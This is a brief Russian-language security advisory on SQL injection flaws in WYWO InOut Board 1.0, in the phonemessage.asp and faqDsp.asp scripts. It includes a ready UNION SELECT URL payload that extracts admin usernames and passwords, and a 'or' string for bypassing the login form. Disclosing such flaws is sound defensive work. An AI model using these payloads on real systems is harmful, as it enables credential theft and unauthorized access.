Программа: WYWO — InOut Board 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "num" сценарием phonemessage.asp и в параметре "catcode" сценарием faqDsp.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения и обойти механизм аутентификации.

Пример:

SQL-инъекция:

http://[target]/[path/phonemessage.asp?num=[SQL]

//phonemessage.asp?num=-1%20union%20select%200,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20employee%20where%20Admin=’Yes’

Обход механизма аутентификации:

http://[target]/[path]//faqDsp.asp?catcode=[SQL]

//login.asp Username: ‘or’ Password: ‘or’



Оставить мнение